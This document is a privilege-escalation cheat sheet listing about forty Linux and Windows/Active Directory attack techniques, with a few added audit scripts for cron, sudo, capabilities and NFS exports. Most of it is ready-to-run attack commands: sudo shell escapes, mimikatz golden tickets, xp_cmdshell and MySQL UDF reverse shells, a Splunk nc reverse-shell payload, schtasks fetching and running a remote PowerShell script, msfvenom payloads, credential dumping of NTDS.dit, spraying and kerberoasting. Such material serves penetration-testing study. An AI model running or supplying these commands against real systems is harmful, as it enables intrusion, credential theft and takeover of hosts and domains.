40 Methods for Privilege Escalation (Part 1)

Abusing Sudo Binaries

Domain: No

Local Admin: Yes

OS: Linux

Type:  Abusing Privileged Files

Methods: 

  1. sudo vim -c ':!/bin/bash'
  2. sudo find /etc/passwd -exec /bin/bash \;
  3. echo "os.execute('/bin/bash')" > /tmp/shell.nse && sudo nmap --script=/tmp/shell.nse
  4. sudo env /bin/bash
  5. sudo awk 'BEGIN {system("/bin/bash")}'
  6. sudo perl -e 'exec "/bin/bash";'
  7. sudo python -c 'import pty;pty.spawn("/bin/bash")'
  8. sudo less /etc/hosts, then type !bash at the pager prompt
  9. sudo man man, then type !bash at the pager prompt
  10. sudo ftp, then type ! /bin/bash at the ftp> prompt
  11. Attacker: socat file:`tty`,raw,echo=0 tcp-listen:1234
  12. Victim: sudo socat exec:'sh -li',pty,stderr,setsid,sigint,sane tcp:192.168.1.105:1234
  13. echo test > notes.txt
  14. sudo zip test.zip notes.txt -T --unzip-command="sh -c /bin/bash"
  15. sudo gcc -wrapper /bin/bash,-s .
  16. sudo docker run -v /:/mnt --rm -it alpine chroot /mnt sh
  17. sudo mysql -e '\! /bin/sh'
  18. sudo ssh -o ProxyCommand=';sh 0<&2 1>&2' x
  19. sudo tmux
  20. sudo pkexec /bin/bash
  21. sudo rlwrap /bin/bash
  22. sudo xargs -a /dev/null sh
  23. sudo /home/anansi/bin/anansi_util manual /bin/bash
  24. sudo apt-get update -o APT::Update::Pre-Invoke::="/bin/bash -i"
  25. echo 'import pty; pty.spawn("/bin/bash")' > flask.py
  26. export FLASK_APP=flask.py
  27. sudo /usr/bin/flask run
  28. sudo apache2 -f /etc/shadow (apache2 echoes the first line of the "config" file, root's password hash, in its syntax error), then crack it:
    john hash --wordlist=/usr/share/wordlists/rockyou.txt

Abusing Scheduled Tasks

Domain: Y/N

Local Admin: Yes

OS: Linux

Type:  Abusing Scheduled Tasks

Methods: 

  1. printf '#!/bin/bash\nchmod +s /bin/bash\n' > /home/user/systemupdate.sh   (a script that a root cron job already runs and that the current user can write to)
  2. chmod +x /home/user/systemupdate.sh
  3. Wait for the job to fire (the schedule is in /etc/crontab or /etc/cron.d/*)
  4. /bin/bash -p
  5. id && whoami
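The precondition for the systemupdate.sh trick is a root cron job whose script (or whose not-yet-existing script directory) the current user can write to. The following check is an added example, not code from the original post: it parses crontab text and reports those targets. The crontab content and the scratch directory are constructed samples; on a real host feed it `cat /etc/crontab /etc/cron.d/* 2>/dev/null` (six leading fields) or `crontab -l` (five leading fields).

```shell
# Added example, not from the original post: find cron jobs whose script the
# current user can write to. Crontab text is taken from a constructed sample
# string so the check runs offline; paths under /nonexistent-dir stand in for
# root-owned locations so the result is the same whether or not this runs as root.

# Print the command part of every job line, skipping comments, blank lines
# and VAR=value assignments. @reboot/@daily style lines carry one keyword in
# place of the five time fields.
cron_commands() {
    awk -v n="$1" '
        /^[ \t]*(#|$)/                   { next }   # comment or blank
        /^[ \t]*[A-Za-z_][A-Za-z0-9_]*=/ { next }   # SHELL=, PATH=, MAILTO=
        {
            lead = ($1 ~ /^@/) ? n - 4 : n
            cmd = ""
            for (i = lead + 1; i <= NF; i++) cmd = cmd (i > lead + 1 ? " " : "") $i
            if (cmd != "") print cmd
        }'
}

# For each job command take the first token that looks like a path (/abs or
# ./rel) and report it when it is writable, or when it does not exist but its
# directory is writable (root would run whatever we create there).
writable_cron_targets() {
    fields=$1
    crontab=$2
    printf '%s\n' "$crontab" | cron_commands "$fields" | while IFS= read -r cmd; do
        set -f                       # no globbing while splitting the command into tokens
        path=""
        for tok in $cmd; do
            case $tok in
                /*|./*) path=$tok; break ;;
            esac
        done
        [ -n "$path" ] || continue
        if [ -w "$path" ]; then
            printf 'writable: %s\n' "$path"
        elif [ ! -e "$path" ] && [ -w "$(dirname "$path")" ]; then
            printf 'missing, dir writable: %s\n' "$path"
        fi
    done
}

# Constructed sample: a scratch directory stands in for /home/user.
SAMPLE_DIR=$(mktemp -d)
printf '#!/bin/bash\necho updating\n' > "$SAMPLE_DIR/systemupdate.sh"
chmod 755 "$SAMPLE_DIR/systemupdate.sh"

SAMPLE_CRONTAB="# constructed /etc/crontab
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

17 *    * * *   root    /nonexistent-dir/run-parts --report /etc/cron.hourly
* * * * *       root    $SAMPLE_DIR/systemupdate.sh
@reboot         root    /nonexistent-dir/agent.sh
*/5 * * * *     root    bash $SAMPLE_DIR/cleanup.sh"

demo_findings() {
    writable_cron_targets 6 "$SAMPLE_CRONTAB"
}

demo_findings
```

The sample reports `systemupdate.sh` as writable and `cleanup.sh` as missing in a writable directory; the two `/nonexistent-dir` jobs are silent. The "missing" case matters as much as the writable one: cron keeps trying to run the absent script, so creating it is enough.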

Golden Ticket With Scheduled Tasks

Domain: Yes

Local Admin: Yes

OS: Windows

Type:  Abusing Scheduled Tasks

Methods: 

1. mimikatz # token::elevate

2. mimikatz # vault::cred /patch

3. mimikatz # lsadump::lsa /patch   (dumps the NTLM hashes of the domain accounts, including krbtgt)

4. mimikatz # kerberos::golden /user:Administrator /rc4:<krbtgt NTLM hash from step 3> /domain:<DOMAIN> /sid:<DOMAIN SID> /sids:<extra SIDs, e.g. Enterprise Admins> /ticket:<OUTPUT TICKET PATH>   (a golden ticket is signed with the krbtgt key, not the Administrator hash; load the saved ticket with kerberos::ptt <OUTPUT TICKET PATH>, or use /ptt instead of /ticket, before step 6)

5. powercat -l -v -p 443

6. schtasks /create /S <DC HOSTNAME> /SC Weekly /RU "NT Authority\SYSTEM" /TN "enterprise" /TR "powershell.exe -c 'iex (iwr http://10.10.10.10/reverse.ps1)'"

7. schtasks /run /S <DC HOSTNAME> /TN "enterprise"

Abusing Interpreter Capabilities

Domain: No

Local Admin: Yes

OS: Linux

Type:  Abusing Capabilities

Methods: 

  1. getcap -r / 2>/dev/null
    1. /usr/bin/python2.6 = cap_setuid+ep
    2. /usr/bin/python2.6 -c 'import os; os.setuid(0); os.system("/bin/bash")'
    3. id && whoami
  2. getcap -r / 2>/dev/null
    1. /usr/bin/perl = cap_setuid+ep
    2. /usr/bin/perl -e 'use POSIX (setuid); POSIX::setuid(0); exec "/bin/bash";'
    3. id && whoami

Abusing Binary Capabilities

Domain: No

Local Admin: Yes

OS: Linux

Type:  Abusing Capabilities

Methods: 

  1. getcap -r / 2>/dev/null
    1. /usr/bin/tar = cap_dac_read_search+ep
    2. /usr/bin/tar -cvf key.tar /root/.ssh/id_rsa   (cap_dac_read_search bypasses read and search permission checks, so any root-readable file can be archived this way)
    3. /usr/bin/tar -xvf key.tar   (extracts to ./root/.ssh/id_rsa)
  2. openssl req -engine /tmp/priv.so   (openssl carrying cap_setuid+ep; /tmp/priv.so is an attacker-built engine library whose load routine calls setuid(0) and sets the SUID bit on /bin/bash)
    1. /bin/bash -p
    2. id && whoami
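Both the sudo list at the top of this post and the two capability sections start from the same enumeration output: `sudo -l` and `getcap -r / 2>/dev/null`. The triage helper below is an added example, not code from the original post. It matches `sudo -l` rules against the binaries abused in "Abusing Sudo Binaries" and flags `getcap` entries whose effective set contains a capability that changes identity or bypasses file permissions. Both inputs are constructed samples, and the two lists are assumptions drawn from this page rather than a complete catalogue (GTFOBins has that).

```shell
# Added example, not from the original post: triage `sudo -l` and `getcap -r /`
# output for the entries the methods on this page abuse.

# Binaries that the sudo methods above turn into a root shell (from this page).
SUDO_SHELL_BINS="vim find nmap env awk perl python python3 less man ftp socat zip gcc docker mysql ssh tmux pkexec rlwrap xargs apt-get flask apache2"

# Capabilities that change identity or bypass file permission checks.
DANGEROUS_CAPS="cap_setuid cap_setgid cap_dac_read_search cap_dac_override cap_sys_admin cap_sys_ptrace cap_sys_module"

# stdin: `sudo -l` output. stdout: "binary<TAB>command" for each rule whose
# binary is in SUDO_SHELL_BINS. The "(ALL : ALL)" runas part and tags such as
# NOPASSWD: are stripped; one rule may list several commands separated by commas.
find_abusable_sudo() {
    awk -v bins="$SUDO_SHELL_BINS" '
        BEGIN { n = split(bins, b, " "); for (i = 1; i <= n; i++) want[b[i]] = 1 }
        /may run the following commands/ { rules = 1; next }
        !rules { next }
        {
            line = $0
            sub(/^[ \t]*\([^)]*\)[ \t]*/, "", line)
            while (sub(/^(NOPASSWD|PASSWD|SETENV|NOSETENV|EXEC|NOEXEC):[ \t]*/, "", line)) { }
            ncmd = split(line, cmds, /,[ \t]*/)
            for (i = 1; i <= ncmd; i++) {
                split(cmds[i], w, " ")
                base = w[1]; sub(/.*\//, "", base)          # /usr/bin/vim -> vim
                if (base in want) printf "%s\t%s\n", base, cmds[i]
            }
        }'
}

# stdin: `getcap -r /` output in either the old "path = cap+ep" or the libcap
# 2.41+ "path cap=ep" form. stdout: "path<TAB>capability" for every dangerous
# capability that is effective (e); permitted-only or inheritable sets are of
# no use to an unmodified interpreter.
find_dangerous_caps() {
    awk -v caps="$DANGEROUS_CAPS" '
        BEGIN { n = split(caps, c, " "); for (i = 1; i <= n; i++) want[c[i]] = 1 }
        NF >= 2 {
            for (f = 2; f <= NF; f++) {
                if ($f == "=") continue
                clause = $f                                  # cap_a,cap_b+ep  or  cap_a=eip
                if (!match(clause, /[=+-][a-z]*$/)) continue
                names = substr(clause, 1, RSTART - 1)
                flags = substr(clause, RSTART + 1)
                if (flags !~ /e/) continue
                m = split(names, nm, ",")
                for (j = 1; j <= m; j++) if (nm[j] in want) printf "%s\t%s\n", $1, nm[j]
            }
        }'
}

# Constructed sample outputs.
SAMPLE_SUDO_L='Matching Defaults entries for dev on web01:
    env_reset, mail_badpass

User dev may run the following commands on web01:
    (ALL : ALL) NOPASSWD: /usr/bin/vim, /usr/bin/find
    (root) /usr/sbin/service apache2 restart
    (root) NOPASSWD: /usr/bin/docker'

SAMPLE_GETCAP='/usr/bin/ping cap_net_raw=ep
/usr/bin/python3.8 cap_setuid=ep
/usr/bin/tar = cap_dac_read_search+ep
/usr/bin/gdb cap_sys_ptrace+i
/usr/sbin/arping cap_net_raw,cap_setuid=p'

demo_sudo() { printf '%s\n' "$SAMPLE_SUDO_L" | find_abusable_sudo; }
demo_caps() { printf '%s\n' "$SAMPLE_GETCAP" | find_dangerous_caps; }

demo_sudo
demo_caps
```

On the sample the sudo check reports vim, find and docker (service is not on the list), and the capability check reports python3.8 and tar only: gdb's cap_sys_ptrace is inheritable, not effective, and arping's cap_setuid is permitted only, so neither gives the interpreter-style shells shown above.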

Abusing ActiveSessions Capabilities

Domain: No

Local Admin: Yes

OS: Windows

Type:  Abusing Capabilities

Methods: 

https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/lateral_movement/Invoke-SQLOSCmd.ps1

. .\Invoke-SQLOSCmd.ps1   (the script downloaded above, dot-sourced)

Invoke-SQLOSCmd -Verbose -Command "net localgroup administrators user1 /add" -Instance COMPUTERNAME

Escalate with TRUSTWORTHY in SQL Server

Domain: Yes

Local Admin: Yes

OS: Windows

Type:  Abusing Capabilities

Methods: 

1. . .\PowerUpSQL.ps1

2. Get-SQLInstanceLocal -Verbose

3. (Get-SQLServerLinkCrawl -Verbose -Instance "10.10.10.10" -Query 'select * from master..sysservers').CustomQuery

4. on the linked server (execute ... at needs RPC Out enabled on the link, and xp_cmdshell can only be switched on after show advanced options):

USE master;

SELECT *, SCHEMA_NAME("schema_id") AS 'schema' FROM "master"."sys"."objects" WHERE "type" IN ('P', 'U', 'V', 'TR', 'FN', 'TF', 'IF');

execute('sp_configure ''show advanced options'',1;RECONFIGURE;sp_configure ''xp_cmdshell'',1;RECONFIGURE') at "<LINKED SERVER NAME>"

5. powershell -ep bypass

6. Import-Module .\powercat.ps1

7. powercat -l -v -p 443 -t 10000

8. back in the SQL session, with xp_cmdshell enabled as in step 4:

execute('exec master..xp_cmdshell ''\\10.10.10.10\reverse.exe''') at "<LINKED SERVER NAME>"
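When the target sits more than one link away, the `execute(...) at` statement from steps 4 and 8 has to be nested once per hop, and every hop doubles the single quotes of everything inside it; this is where hand-written link queries usually break. The builder below is an added example, not code from the original post or from PowerUpSQL. The server names and the command are constructed placeholders; the real link path is what Get-SQLServerLinkCrawl reports.

```shell
# Added example, not from the original post: build the nested execute ... at
# statement that runs a query on a SQL Server reached through a chain of links.

# Double every single quote so the text can sit inside a '...' literal.
sql_quote() {
    printf '%s' "$1" | sed "s/'/''/g"
}

# link_exec QUERY HOP1 [HOP2 ...]
# Returns the statement to run on the local instance so that QUERY executes on
# the last hop, travelling HOP1 -> HOP2 -> ... The recursion wraps the far hops
# first; each outer hop then quotes the inner statement once more.
link_exec() {
    local query=$1
    local hop=$2
    shift 2
    if [ $# -gt 0 ]; then
        query=$(link_exec "$query" "$@")
    fi
    printf "execute('%s') at \"%s\"" "$(sql_quote "$query")" "$hop"
}

# The two inner queries used on this page: enable xp_cmdshell, then run a command.
ENABLE_XP_CMDSHELL="EXEC sp_configure 'show advanced options',1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell',1;RECONFIGURE"

xp_cmdshell_query() {
    printf "EXEC master..xp_cmdshell '%s'" "$(sql_quote "$1")"
}

# Constructed example: run whoami on SRV2, which is only linked from SRV1.
demo_two_hops() {
    link_exec "$(xp_cmdshell_query 'whoami')" SRV1 SRV2
}

link_exec "$ENABLE_XP_CMDSHELL" SRV1 SRV2; echo
demo_two_hops; echo
```

For one hop the output is `execute('EXEC master..xp_cmdshell ''whoami''') at "SRV1"`; for two hops the inner statement is quoted again, so the four and six consecutive quotes around `whoami` in the two-hop result are expected, not a bug. Every hop still needs RPC Out enabled on its link for execute ... at to work.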

Abusing Mysql run as root

Domain: Yes

Local Admin: Yes

OS: Linux

Type:  Abusing Services

Methods: 

  • ps aux | grep root   (shows whether mysqld, or a mysql client, is running as root)

mysql -u root -p

\! chmod +s /bin/bash

exit

/bin/bash -p

id && whoami

\! runs the command from the mysql client, with the privileges of whoever started the client, not those of the mysqld server. It therefore yields root only when the client itself runs as root (for example through sudo mysql, method 17 in the sudo list above). If only the server runs as root, use the UDF method further down: its sys_exec runs inside mysqld.

Abusing journalctl

Domain: No

Local Admin: Yes

OS: Linux

Type:  Abusing Services

Methods: 

  • sudo journalctl   (journalctl must run as root, and the output must exceed the screen height so that the less pager opens)
  • !/bin/sh   (typed at the pager prompt)

Abusing VDS

Domain: No

Local Admin: Yes

OS: Windows

Type:  Abusing Services

Methods: 

. .\PowerUp.ps1

Invoke-ServiceAbuse -Name 'vds' -UserName 'domain\user1'   (Get-ModifiableService from PowerUp lists the services whose configuration the current user may change; the default action adds the given user to the local Administrators group)

Abusing Browser

Domain: No

Local Admin: Yes

OS: Windows

Type:  Abusing Services

Methods: 

. .\PowerUp.ps1

Invoke-ServiceAbuse -Name 'browser' -UserName 'domain\user1'

Abusing LDAP

Domain: Yes

Local Admin: Yes

OS: Linux

Type:  Abusing Services

Methods: 

0. ldapmodify -x -D <BIND DN allowed to write cn=config> -w PASSWORD

1. paste this (adds the openssh-lpk schema; skip it if the directory already defines sshPublicKey)

dn: cn=openssh-lpk,cn=schema,cn=config
changetype: add
objectClass: olcSchemaConfig
cn: openssh-lpk
olcAttributeTypes: ( 1.3.6.1.4.1.24552.500.1.1.1.13 NAME 'sshPublicKey'
 DESC 'MANDATORY: OpenSSH Public key'
 EQUALITY octetStringMatch
 SYNTAX 1.3.6.1.4.1.1466.115.121.1.40 )
olcObjectClasses: ( 1.3.6.1.4.1.24552.500.1.1.2.0 NAME 'ldapPublicKey' SUP top AUXILIARY
 DESC 'MANDATORY: OpenSSH LPK objectclass'
 MAY ( sshPublicKey $ uid ) )

2. ldapmodify -x -D <BIND DN allowed to write the user entry> -w PASSWORD

3. paste this (change blocks are separated by a line holding only "-"; uidNumber and gidNumber are replaced with those of the account to take over, 0 for root, so that the SSH login with the injected key is mapped to that identity)

dn: uid=UID,ou=users,ou=linux,ou=servers,dc=DC,dc=DC
changetype: modify
add: objectClass
objectClass: ldapPublicKey
-
add: sshPublicKey
sshPublicKey: <content of id_rsa.pub>
-
replace: uidNumber
uidNumber: <TARGET UID, e.g. 0>
-
replace: gidNumber
gidNumber: <TARGET GID, e.g. 0>

LLMNR Poisoning

Domain: Yes

Local Admin: Y/N

OS: Windows

Type:  Abuse Service

Methods: 

1. responder -I eth1 -v

2. create Book.url and drop it on a share that users browse; Explorer fetches the icon over SMB from the attacker host and the user's NTLMv2 response lands in Responder

[InternetShortcut]
URL=https://facebook.com
IconIndex=0
IconFile=\\attacker_ip\not_found.ico

Abusing Certificate Services

Domain: Yes

Local Admin: Y/N

OS: Windows

Type:  Abuse Service

Methods: 

adcspwn.exe --adcs <cs server> --port [local port] --remote [computer]

adcspwn.exe --adcs cs.pwnlab.local

adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --port 9001

adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --output C:\Temp\cert_b64.txt

adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --username pwnlab.local\mranderson --password The0nly0ne! --dc dc.pwnlab.local

MySQL UDF Code Injection

Domain: Yes

Local Admin: Yes

OS: Linux

Type:  Injection

Methods: 

mysql -u root -p

mysql> use mysql;

mysql> create table admin(line blob);

mysql> insert into admin values(load_file('/tmp/lib_mysqludf_sys.so'));

mysql> select * from admin into dumpfile '/usr/lib/lib_mysqludf_sys.so';

mysql> create function sys_exec returns integer soname 'lib_mysqludf_sys.so';

mysql> select sys_exec('bash -i >& /dev/tcp/10.10.10.10/9999 0>&1');

On MySQL 5.x and later the dumpfile path must be the server's plugin directory (select @@plugin_dir;) and secure_file_priv must permit writing there. sys_exec runs inside mysqld, so the shell comes back with the privileges of the mysqld user, which is why this needs the server, not the client, to run as root.

Impersonation Token with ImpersonateLoggedOnUser

Domain: No

Local Admin: Yes

OS: Windows

Type:  Injection

Methods: 

1. SharpImpersonation.exe user:<user> shellcode:<URL>

2. SharpImpersonation.exe user:<user> technique:ImpersonateLoggedOnUser

Impersonation Token with SeImpersonatePrivilege

Domain: No

Local Admin: Yes

OS: Windows

Type:  Injection

Methods: 

1. execute-assembly sweetpotato.exe -p beacon.exe   (from a Cobalt Strike beacon; SweetPotato needs SeImpersonatePrivilege, check with whoami /priv)

Impersonation Token with SeLoadDriverPrivilege

Domain: No

Local Admin: Yes

OS: Windows

Type:  Injection

Methods: 

1. EOPLOADDRIVER.exe System\CurrentControlSet\MyService C:\Users\Username\Desktop\Driver.sys

OpenVPN Credentials

Domain: No

Local Admin: Yes

OS: Linux

Type:  Enumeration & Hunt

Methods: 

locate "*.ovpn"   (or find / -name "*.ovpn" 2>/dev/null; then look for auth-user-pass lines that point at a stored credential file)

Bash History

Domain: No

Local Admin: Yes

OS: Linux

Type:  Enumeration & Hunt

Methods: 

  • history
  • cat /home/<user>/.bash_history
  • cat ~/.bash_history | grep -i passw

Packet Capture

Domain: No

Local Admin: Yes

OS: Linux

Type:  Sniff

Methods: 

  • tcpdump -nt -r capture.pcap -A 2>/dev/null | grep -P 'pwd='

NFS Root Squashing

Domain: Yes

Local Admin: Yes

OS: Linux

Type:  Remote Procedure Calls (RPC)

Methods: 

  • showmount -e <victim_ip>   (look for an export the attacker can mount; the trick needs it exported with no_root_squash)

mkdir /tmp/mount

mount -o rw,vers=2 <victim_ip>:/tmp /tmp/mount   (on the attacker machine, as root; use vers=3 if the server refuses NFSv2)

cd /tmp/mount

cp /bin/bash .   (the binary must run on the victim, so copy one of the victim's architecture and libc, ideally the victim's own /bin/bash)

chmod +s bash

then on the victim, as the low-privileged user: /tmp/bash -p
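What makes the mount-and-chmod trick work is an export that combines rw with no_root_squash, so the attacker's root on the client is not remapped to nobody on the server. The parser below is an added example, not code from the original post: it reads /etc/exports syntax and lists exactly those client/export pairs. The exports text is a constructed sample; on a target you only see the export list and allowed clients from `showmount -e`, so this is the check to run on a server you administer or on an /etc/exports you have read through another primitive.

```shell
# Added example, not from the original post: report /etc/exports entries that
# let a client's root write as root (rw + no_root_squash).

# stdin: exports file. stdout: "path<TAB>client<TAB>options" for each client
# whose option list contains both rw and no_root_squash. A client written as
# "(opts)" with no host means every host. Options that are not listed keep the
# server defaults (ro, root_squash), so a client with no option list is safe.
risky_exports() {
    awk '
        /^[ \t]*(#|$)/ { next }                  # comment or blank line
        {
            path = $1
            for (i = 2; i <= NF; i++) {
                client = $i; opts = ""
                p = index(client, "(")
                if (p) {
                    opts = substr(client, p + 1); sub(/\)$/, "", opts)
                    client = substr(client, 1, p - 1)
                }
                if (client == "") client = "*"
                if (opts ~ /(^|,)rw(,|$)/ && opts ~ /(^|,)no_root_squash(,|$)/)
                    printf "%s\t%s\t%s\n", path, client, opts
            }
        }'
}

# Constructed sample exports file.
SAMPLE_EXPORTS='# constructed /etc/exports
/srv/share   10.0.0.0/24(rw,sync,no_subtree_check)
/tmp         *(rw,no_root_squash)
/backup      10.0.0.5(ro,no_root_squash) 10.0.0.6(rw,no_root_squash,sync)
/home        192.168.1.0/24(rw,root_squash) 192.168.1.7
/scratch     (rw,no_root_squash)'

demo_exports() { printf '%s\n' "$SAMPLE_EXPORTS" | risky_exports; }

demo_exports
```

The sample yields /tmp for every host, /backup only from 10.0.0.6 (10.0.0.5 has it read-only, so a SUID binary cannot be written there) and /scratch for every host; /srv/share is squashed by default and /home says so explicitly. The same check run against the server's `exportfs -v` output is the quickest audit for this misconfiguration.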

Abusing Access Control List

Domain: Yes

Local Admin: Yes

OS: Windows

Type:  Abuse Privilege

Methods: 

  • $user = "megacorp\jorden"

$folder = "C:\Users\administrator"

$acl = Get-Acl $folder

$aclpermissions = $user, "FullControl", "ContainerInherit, ObjectInherit", "None", "Allow"

$aclrule = New-Object System.Security.AccessControl.FileSystemAccessRule $aclpermissions

$acl.AddAccessRule($aclrule)

Set-Acl -Path $folder -AclObject $acl   (requires WriteDACL, or ownership, on the folder)

Get-Acl $folder | Format-List

Escalate With SeBackupPrivilege

Domain: Yes

Local Admin: Yes

OS: Windows

Type:  Abuse Privilege

Methods: 

import-module .\SeBackupPrivilegeUtils.dll

import-module .\SeBackupPrivilegeCmdLets.dll

Copy-FileSeBackupPrivilege z:\Windows\NTDS\ntds.dit C:\temp\ntds.dit

ntds.dit is locked while the directory service runs, so z: is a shadow copy exposed with diskshadow (see "Dumping with diskshadow" below). Save the SYSTEM hive as well, reg save HKLM\SYSTEM C:\temp\system, since its boot key is needed to decrypt the hashes.

Escalate With SeImpersonatePrivilege

Domain: Yes

Local Admin: Yes

OS: Windows

Type:  Abuse Privilege

Methods: 

https://github.com/dievus/printspoofer

printspoofer.exe -i -c "powershell -c whoami"

Escalate With SeLoadDriverPrivilege

Domain: Yes

Local Admin: Yes

OS: Windows

Type:  Abuse Privilege

Methods: 

FIRST:

Download https://github.com/FuzzySecurity/Capcom-Rootkit/blob/master/Driver/Capcom.sys

Download https://raw.githubusercontent.com/TarlogicSecurity/EoPLoadDriver/master/eoploaddriver.cpp

Download https://github.com/tandasat/ExploitCapcom

change ExploitCapcom.cpp line 292

TCHAR CommandLine[] = TEXT("C:\\Windows\\system32\\cmd.exe");

to

TCHAR CommandLine[] = TEXT("C:\\test\\shell.exe");

then compile ExploitCapcom.cpp and eoploaddriver.cpp to .exe

SECOND:

1. msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.4 LPORT=4444 -f exe > shell.exe, and start the matching multi/handler in msfconsole (run) before step 3

2. .\eoploaddriver.exe System\C
urrentControlSet\MyService C:\test\capcom.sys

3. .\ExploitCapcom.exe

4. the handler receives the SYSTEM session

Escalate With ForceChangePassword

Domain: Yes

Local Admin: Yes

OS: Windows

Type:  Abuse Privilege

Methods: 

https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1

Import-Module .\PowerView.ps1

$pass = ConvertTo-SecureString '<NEW PASSWORD>' -AsPlainText -Force

Set-DomainUserPassword -Identity user1 -AccountPassword $pass -Verbose

Enter-PSSession -ComputerName COMPUTERNAME -Credential DOMAIN\user1   (prompts for the password just set)

Escalate With GenericWrite

Domain: Yes

Local Admin: Yes

OS: Windows

Type:  Abuse Privilege

Methods: 

$pass = ConvertTo-SecureString 'Password123#' -AsPlainText -Force

$creds = New-Object System.Management.Automation.PSCredential('DOMAIN\MASTER USER', $pass)   (the account holding GenericWrite over USER1)

Set-DomainObject -Credential $creds -Identity USER1 -Clear serviceprincipalname

Set-DomainObject -Credential $creds -Identity USER1 -Set @{serviceprincipalname='none/fluu'}

.\Rubeus.exe kerberoast /domain:<DOMAIN>   (the new SPN makes USER1's TGS ticket requestable; crack it offline)

Abusing GPO

Domain: Yes

Local Admin: Yes

OS: Windows

Type:  Abuse Privilege

Methods: 

1. .\SharpGPOAbuse.exe --AddComputerTask --TaskName "Update" --Author DOMAIN\<USER> --Command "cmd.exe" --Arguments "/c net user Administrator Password!@# /domain" --GPOName "ADDITIONAL DC CONFIGURATION"

Pass-the-Ticket

Domain: Yes

Local Admin: Y/N

OS: Windows

Type:  Abuse Ticket

Methods: 

1. .\Rubeus.exe asktgt /user:<USER>$ /rc4:<NTLM HASH> /ptt

2. klist

Golden Ticket

Domain: Yes

Local Admin: Y/N

OS: Windows

Type:  Abuse Ticket

Methods: 

1. mimikatz # lsadump::dcsync /user:<DOMAIN>\krbtgt   (the golden ticket is signed with the krbtgt key)

2. mimikatz # kerberos::golden /user:<USER> /domain:<DOMAIN> /sid:<DOMAIN SID> /rc4:<krbtgt NTLM HASH> /id:<USER RID> /ptt

Abusing Splunk Universal Forwarder

Domain: No

Local Admin: Yes

OS: Linux/Windows

Type:  Abuse Channel

Methods: 

python PySplunkWhisperer2_remote.py --lhost 10.10.10.5 --host 10.10.15.20 --username admin --password admin --payload '/bin/bash -c "rm /tmp/luci11;mkfifo /tmp/luci11;cat /tmp/luci11|/bin/sh -i 2>&1|nc 10.10.10.5 5555 >/tmp/luci11"'

Abusing Gdbus

Domain: No

Local Admin: Yes

OS: Linux

Type:  Abuse Channel

Methods: 

gdbus call --system --dest com.ubuntu.USBCreator --object-path /com/ubuntu/USBCreator --method com.ubuntu.USBCreator.Image /home/nadav/authorized_keys /root/.ssh/authorized_keys true   (the usb-creator D-Bus helper runs as root and copies the first path to the second, so the attacker's public key ends up in root's authorized_keys)

Abusing Trusted DC

Domain: Yes

Local Admin: Y/N

OS: Windows

Type:  Abuse Channel

Methods: 

  1. Find a user on the first DC
  2. If port 6666 is open (the WinRM port used with evil-winrm -P below)
  3. proxychains evil-winrm -u user -p 'pass' -i 10.100.9.253 -P 6666
  4. .\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "token::elevate" "lsadump::secrets" "exit"
  5. proxychains evil-winrm -u Administrator -p 'pass dumped in step 4' -i 10.100.10.100 -P 6666

NTLM Relay 

Domain: Yes

Local Admin: Y/N

OS: Windows

Methods: 

responder -I eth1 -v

ntlmrelayx.py …

Exchange Relay 

Domain: Yes

Local Admin: Y/N

OS: Windows

Type:  NTLM

Methods: 

./exchangeRelayx.py …

Dumping with diskshadow

Domain: Yes

Local Admin: Y/N

OS: Windows

Type:  Dumping

Methods: 

1. priv.txt contains

SET CONTEXT PERSISTENT NOWRITERS
add volume c: alias 0xprashant
create
expose %0xprashant% z:

2. run it with diskshadow /s priv.txt from a directory you can write to (diskshadow needs a writable working directory), then copy z:\Windows\NTDS\ntds.dit and the SYSTEM hive out of the exposed snapshot

Dumping with vssadmin

Domain: Yes

Local Admin: Y/N

OS: Windows

Type:  Dumping

Methods: 

vssadmin create shadow /for=C:

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\ShadowCopy

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\ShadowCopy

Use the shadow copy number that vssadmin prints; the SYSTEM hive holds the boot key needed to decrypt NTDS.dit.

Password Spraying

Domain: Yes

Local Admin: Y/N

OS: Windows

Type:  Spraying

Methods: 

./kerbrute_linux_amd64 passwordspray -d domain.local --dc 10.10.10.10 domain_users.txt Password123

AS-REP Roasting

Domain: Yes

Local Admin: Y/N

OS: Windows

Type:  Kerberos

Methods: 

.\Rubeus.exe asreproast

Kerberoasting

Domain: Yes

Local Admin: Y/N

OS: Windows

Type:  Kerberos

Methods: 

GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100 -request

crackmapexec ldap 10.0.2.11 -u 'username' -p 'password' --kdcHost 10.0.2.11 --kerberoast output.txt
